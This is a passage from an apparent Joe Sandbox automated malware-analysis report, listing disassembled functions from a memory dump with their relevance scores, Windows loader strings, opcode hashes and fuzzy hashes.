                                            • Process initialization failed with status 0x%08lx, xrefs: 011020F3
                                            • LdrpInitializationFailure, xrefs: 011020FA
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01102104
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
                                            • Instruction ID: 08756b3918a5597afdabc437cc503ef25d3d892972a185f0d81ff81a5bf24c9c
                                            • Opcode Fuzzy Hash: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
                                            • Instruction Fuzzy Hash: A8F0C235A40308AFE729E64CCC46F9A777DFB80B54F54006DFA90BB6C5D2F0A940CA91
                                            Function 010903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
                                            • Instruction ID: 9afe3e0313d30227efcf1a6d89d14c72217b6644e03342c6ed4cb346093a38a0
                                            • Opcode Fuzzy Hash: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
                                            • Instruction Fuzzy Hash: E57159B1A0014A9FDF05DFA9C994BAEB7F8BF08744F144069E945EB251EB34ED41CBA0
                                            Function 010952A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524
                                            • Opcode ID: f50c0fcdce8ce503238fd0f8c0aa6c41e58b6740d8c0d21b34630b492c71837a
                                            • Instruction ID: 29c96a46f065a1e8a536f8acc242a30f1cb6a74f3545820fbd5d23e44a1f88c4
                                            • Opcode Fuzzy Hash: f50c0fcdce8ce503238fd0f8c0aa6c41e58b6740d8c0d21b34630b492c71837a
                                            • Instruction Fuzzy Hash: 6032CE705083118FDB658F1AD8A477EBBE1EF88704F14895EFAC59B290E735D840EB92
                                            Function 0114A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: bc5b0cb449afaf569bdd199b49ecc3c1cbf71806bf0d39f183e9430fafe03e4d
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: 91C1E4312443429BEB29CF28D841B6BBBE5BFC4B18F094A2DF696CB290D775D505CB81
                                            Function 0108A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0108A309
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0108A2FB
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
                                            • Instruction ID: 5c60fda5514f1f03659857959585de44759f838d0f1d09ede119d43bf19e4609
                                            • Opcode Fuzzy Hash: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
                                            • Instruction Fuzzy Hash: 0341AC31B08659DFDB21AF69C844BAE7BF4BF84300F1480AAE9C0DB691E2B5D940CB40
                                            Function 011135BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                            • API String ID: 0-118005554
                                            • Opcode ID: 2950eedc4b8ca41ca524ca083f04dd6fe2162ef652880b7539430cc6e6aa901e
                                            • Instruction ID: 12904ec63f2a4767058d698c9d61d0b3bc6cfe2dce95f6793618de49e70e3657
                                            • Opcode Fuzzy Hash: 2950eedc4b8ca41ca524ca083f04dd6fe2162ef652880b7539430cc6e6aa901e
                                            • Instruction Fuzzy Hash: FA31C3312197429FE319DF28D854B5AB7E4FF84724F050869F9A4CB398EB30DA05CB92
                                            Function 010B329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local\$@
                                            • API String ID: 0-380025441
                                            • Opcode ID: 44a6ee1503ad7f64968c6fb3c7fc8bd72a1cff464b1e7a6fe056ec669421c326
                                            • Instruction ID: ecba78d0fe8e29cafcbca9cbf828a576344b7e63f6373884314c9c0cdc43ecfc
                                            • Opcode Fuzzy Hash: 44a6ee1503ad7f64968c6fb3c7fc8bd72a1cff464b1e7a6fe056ec669421c326
                                            • Instruction Fuzzy Hash: 3E31AFB2109705AFC311DF28C8C0A9FBBE8FB94A54F54492EF9D58B310DA30DD048B92
                                            Function 010B34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpInitializeAssemblyStorageMap, xrefs: 010F2A90
                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 010F2A95
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                            • API String ID: 0-2653619699
                                            • Opcode ID: c0a7e668bdce2a6de18197e0e606c66d4fcf4b1830559f5d4ceb8bad53767182
                                            • Instruction ID: a3944e5f11d36737306c8f41f7a77054b603129f007a1516dff7344c75ec4ed1
                                            • Opcode Fuzzy Hash: c0a7e668bdce2a6de18197e0e606c66d4fcf4b1830559f5d4ceb8bad53767182
                                            • Instruction Fuzzy Hash: F8112C75B00205FBF7268A4D8D82FEB76E9AB94B54F24806D7B44DF240D775DD008290
                                            Function 010BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
                                            • Instruction ID: c237710e2e26f6dd59c5c8fc83f61aa2f66f377bb4a4022d248b3efc49236d11
                                            • Opcode Fuzzy Hash: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
                                            • Instruction Fuzzy Hash: 7701D1B2240700EFE311DF14CD85B967BF8E798B15F008939B698CB290E734E904CB46
                                            Function 01087370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a818c232ea97b997773250437b40a7218541ed2d82ae149432dfb322696aee7
                                            • Instruction ID: 0dbd7f7c3a10117234387ced5260e24a0984ee488ff261e727d21160a126f535
                                            • Opcode Fuzzy Hash: 4a818c232ea97b997773250437b40a7218541ed2d82ae149432dfb322696aee7
                                            • Instruction Fuzzy Hash: B7A18A71608742CFC365EF28C480A2ABBF5BF98304F24496EE5D58B355EB70E945CB92
                                            Function 0113B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PreferredUILanguages
                                            • API String ID: 0-1884656846
                                            • Opcode ID: 0a5015f63662e41b069be65269c5d4b19f6bf921f881a7bb7c227170459606f8
                                            • Instruction ID: 6538d2fd2586b23fa16212bb83fd37c28dbe98f7735fbcca654caaedf6f7f503
                                            • Opcode Fuzzy Hash: 0a5015f63662e41b069be65269c5d4b19f6bf921f881a7bb7c227170459606f8
                                            • Instruction Fuzzy Hash: 5641B576D08229ABDB19DA99C840BEEB7B9EF84710F054126ED41F7254E734DE40C7A4
                                            Function 0112705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: kLsE
                                            • API String ID: 0-3058123920
                                            • Opcode ID: f1ea0f22d4089582dd72a23a8610e3b212710eb4b5375b21dc797b223a332d1e
                                            • Instruction ID: 4fb9e3456f0d4ab592a23f481cb818dd7d5da951b85c35bd88ff0bbb432bc11a
                                            • Opcode Fuzzy Hash: f1ea0f22d4089582dd72a23a8610e3b212710eb4b5375b21dc797b223a332d1e
                                            • Instruction Fuzzy Hash: F5417C315047628BF73DAB68E844BAA3FB1AB51B28F24013DEDB08A2C5CB7404D5C7A0
                                            Function 010B7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                            • Instruction ID: 3408eb02e17637b40f02886c1c3d493e016ab60a7e71fc3dc6838abbf4d4d326
                                            • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                            • Instruction Fuzzy Hash: CA41B275A0065AEBCF25DF48C490BFEB7B5FF84701F00409AEA81A7280DB70D941CBA2
                                            Function 01085096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            • Opcode ID: 952b19ada5935d1ca0ab76f902016ddb096d57bf550ddfc0436b38bb10fa59a4
                                            • Instruction ID: 8f4af71b6ae79c0fa272559c9caf0ff57474a52316ab3c7d287fe13a2f50cc92
                                            • Opcode Fuzzy Hash: 952b19ada5935d1ca0ab76f902016ddb096d57bf550ddfc0436b38bb10fa59a4
                                            • Instruction Fuzzy Hash: 0E11E23070C6028BEFB4690D8C5167ABBD5FB81224F34856AF5E2CF391DA71DC428B81
                                            Function 0110106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrCreateEnclave
                                            • API String ID: 0-3262589265
                                            • Opcode ID: 6268d64285255088a71b64b2a521397467d6519c5045cd79b6c339cdf655f3c7
                                            • Instruction ID: 6d5091f445bb3a0956cef61c364243a0135e4beeafedc82625c84500558fb8f4
                                            • Opcode Fuzzy Hash: 6268d64285255088a71b64b2a521397467d6519c5045cd79b6c339cdf655f3c7
                                            • Instruction Fuzzy Hash: D621F5B19183449FC325DF2AC844A9BFBF8BBD5B50F004A1EB9A496350D7B4D445CB92
                                            Function 010D739A Relevance: .7, Instructions: 705COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b71388a2eec60e291e9aff1d20ab10e11b74dd2b7e74a1eb916089a236426b4c
                                            • Instruction ID: 858f9573ca7bef5481da19a53852687148c6a43ed53f8aef52c79017f7fc1392
                                            • Opcode Fuzzy Hash: b71388a2eec60e291e9aff1d20ab10e11b74dd2b7e74a1eb916089a236426b4c
                                            • Instruction Fuzzy Hash: 14428F71A007169FDB19CF5DC490AAEBBF2FF88318B14859DD596AB341DB34E842CB90
                                            Function 010AB2C0 Relevance: .6, Instructions: 629COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1af6f0a0cc84a76834f352ec4cb72b097e0deb12cd618d06d588131d0cf80eb
                                            • Instruction ID: ee2285fa2b5eaa8e13415b1f1bd4ecdd702b0a97f162b933b9238d0f91d58185
                                            • Opcode Fuzzy Hash: a1af6f0a0cc84a76834f352ec4cb72b097e0deb12cd618d06d588131d0cf80eb
                                            • Instruction Fuzzy Hash: 1932AE72E00219DFDB24CFA8C894BEEBBB1FF54714F584169E885AB381E7359941CB90
                                            Function 0112A118 Relevance: .6, Instructions: 591COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
                                            • Instruction ID: 5d43f6d2f9e1749ecf888a252d6bc951c05c7a71db93dc559a835a6a34b5bb91
                                            • Opcode Fuzzy Hash: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
                                            • Instruction Fuzzy Hash: 4122E5702046B18FEB2DCF2DE054372BBF1AF45300F198459DA968FA86E335E462DB65
                                            Function 010865D0 Relevance: .4, Instructions: 383COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cb0bb089b094da124dd28cd9b6db7c31d5d0e50d1a10fa13cb4dad8630c63dd8
                                            • Instruction ID: db3bb7ae27942513bf2b374e6d9e9fd4e4eee5956142b88f24b8f0bcebc916e4
                                            • Opcode Fuzzy Hash: cb0bb089b094da124dd28cd9b6db7c31d5d0e50d1a10fa13cb4dad8630c63dd8
                                            • Instruction Fuzzy Hash: C1E18071508342CFC715EF28C490A6ABBE1FF89314F0689ADE5D987351EB32E945CB92
                                            Function 01078397 Relevance: .4, Instructions: 380COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca22217f7d3f87ed92676c1c034c0757d6580b89fc118c6873cb6012356b2879
                                            • Instruction ID: 4d84cd9ed7390bfcbdddc1385c4cdd22e395f53074dab07fe89bb02377bd7533
                                            • Opcode Fuzzy Hash: ca22217f7d3f87ed92676c1c034c0757d6580b89fc118c6873cb6012356b2879
                                            • Instruction Fuzzy Hash: 7AD1F571A003069BDB14DF28C884BBEB7F5BF58304F05856EE996DB280EB34E954CB54
                                            Function 0109F460 Relevance: .3, Instructions: 321COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5cf3e84468f4c44fca816d4e2afd70206edf8c6f4af23790c288c2a7846cc864
                                            • Instruction ID: 32d71b3e4d2304b9de71b74c023370566e11968be3989fdfb2da941dd638ffb1
                                            • Opcode Fuzzy Hash: 5cf3e84468f4c44fca816d4e2afd70206edf8c6f4af23790c288c2a7846cc864
                                            • Instruction Fuzzy Hash: 36C1B171A013168BDF29CF2CC4A07BD7FE1EB48714F1941A9E982DB3A5EB349941DB90
                                            Function 01090535 Relevance: .3, Instructions: 300COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction ID: 71437b57901b45f8f6907dca8eb96011a6a5e7cd75865f404396a28fca97bfc5
                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction Fuzzy Hash: 16B11631600646EFDF15DB69C864BBEBBFAAF84300F144594E6D2DB285D730E941DB90
                                            Function 010A90DB Relevance: .3, Instructions: 287COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b471c81bd5d92a6491e6a0d38cc12fa9da8a4b6082ce39a9426d3d5f347c7221
                                            • Instruction ID: f8602ac906d3ec72d9dec77f4e801ae69a3b99436fe8715f249f62481bde3967
                                            • Opcode Fuzzy Hash: b471c81bd5d92a6491e6a0d38cc12fa9da8a4b6082ce39a9426d3d5f347c7221
                                            • Instruction Fuzzy Hash: 19A16D7190061AAFEF16DFA9CC95FAE7BB9EF49750F010054FA40AB2A0D7759C40DBA0
                                            Function 010883C0 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7447ce601568d95a02b538f254c0a32d621cd705347eb2ff869d42338b210c7b
                                            • Instruction ID: 10125e6a9f9b0db2ae65215d5087c912835a3ae2647a0221008822dac6ffe09d
                                            • Opcode Fuzzy Hash: 7447ce601568d95a02b538f254c0a32d621cd705347eb2ff869d42338b210c7b
                                            • Instruction Fuzzy Hash: 69C15774208341CFD7A4DF19C484BAAB7E5BF88304F44896EE9C987291D774E909CFA2
                                            Function 0107C427 Relevance: .3, Instructions: 280COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e28653082149beedd18086169d4dbe980e873ade8e40852d5a63054b1f5c06c
                                            • Instruction ID: 36b46d85a5f7f532b1b880eaa72f466a1ef2854c403130bc89d606d93d00fa8b
                                            • Opcode Fuzzy Hash: 6e28653082149beedd18086169d4dbe980e873ade8e40852d5a63054b1f5c06c
                                            • Instruction Fuzzy Hash: 7BB15F70A002668BEB64CF68C990BADB7F1AF44744F0485E9D58AAB241EB719DC5CB24
                                            Function 010AE5E7 Relevance: .3, Instructions: 278COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c833eb97250750a98d74204624e60534f42e714ae0cdf98ff2f0f8da1216616d
                                            • Instruction ID: 7b97443035c62b600f896e1ab4ec57d69a38c14e468da82256c0139cdfbd3e04
                                            • Opcode Fuzzy Hash: c833eb97250750a98d74204624e60534f42e714ae0cdf98ff2f0f8da1216616d
                                            • Instruction Fuzzy Hash: 47A13531E0061A9FEB21DBA9C948BAEBBF4BF04754F1501A5EAD0AB2C1D7749D40CBD1
                                            Function 010C0185 Relevance: .3, Instructions: 276COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 589d04687372c730774595f60a01164152fa8714b50a3922e1d7393dd65d0e6b
                                            • Instruction ID: 32f61f31038738a0d347a78093ca981768fd03a9927f2c568683263beb049b4c
                                            • Opcode Fuzzy Hash: 589d04687372c730774595f60a01164152fa8714b50a3922e1d7393dd65d0e6b
                                            • Instruction Fuzzy Hash: 22A1DDB4A0061ADBEB65DF69C891BAEB7F5FF44B18F00402DFA8597285DB34A841CF40
                                            Function 01154500 Relevance: .3, Instructions: 275COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12374e88a14ff0715dbe34dc1df87cec77581500c4a2dda5a1ac48ad623c6326
                                            • Instruction ID: 4d6c524c6357716414a4a6bc9a78ca31df9f026b2180d3c14c57cae134778a1b
                                            • Opcode Fuzzy Hash: 12374e88a14ff0715dbe34dc1df87cec77581500c4a2dda5a1ac48ad623c6326
                                            • Instruction Fuzzy Hash: 2CA1E072604602EFD719DF58C980B9ABBE9FF48704F450528F9A9DBA51E330ED80CB91
                                            Function 0109E3F0 Relevance: .3, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4269e28c2c823a88dc85c256fa7b41f5e88051761cec79b588e71c8ba9d99359
                                            • Instruction ID: 7a4c90539ed3fb39bb3a9e9d86df5491e3066a9eee4d35e246e30ae9edef2721
                                            • Opcode Fuzzy Hash: 4269e28c2c823a88dc85c256fa7b41f5e88051761cec79b588e71c8ba9d99359
                                            • Instruction Fuzzy Hash: 71914131A00616DFEF24DB69C4A4BBEBBE1EF94714F0440A9E9859B390EB34DC41DB91
                                            Function 01081131 Relevance: .3, Instructions: 259COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de28782a383ba3eb22854aeb774bc2ba54d6b66bc61033039fb0c4d05b01dd24
                                            • Instruction ID: fe7bd3c1107969c7b0e8bcea217a8e2a04405de44fd3287ef377961d04861bd6
                                            • Opcode Fuzzy Hash: de28782a383ba3eb22854aeb774bc2ba54d6b66bc61033039fb0c4d05b01dd24
                                            • Instruction Fuzzy Hash: 99B101B56093418FD754CF28C480A5ABBF1BF88304F188A6EE9DAC7352D771E946CB42
                                            Function 01089486 Relevance: .3, Instructions: 259COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28def56522047d6a746b3719c4d5f60907d4c25ea0d41cebeef64037df7cd78d
                                            • Instruction ID: 1ce1e226af840b5424a9f48cbf42b0cf8a8a24cb7c3bfb58dd8dc05785c499b2
                                            • Opcode Fuzzy Hash: 28def56522047d6a746b3719c4d5f60907d4c25ea0d41cebeef64037df7cd78d
                                            • Instruction Fuzzy Hash: 36B14A74904205CFDB69EF1CD4846B9BBF0BB8831CF2445A9D8E19B796D731D882CBA1
                                            Function 0113B52F Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
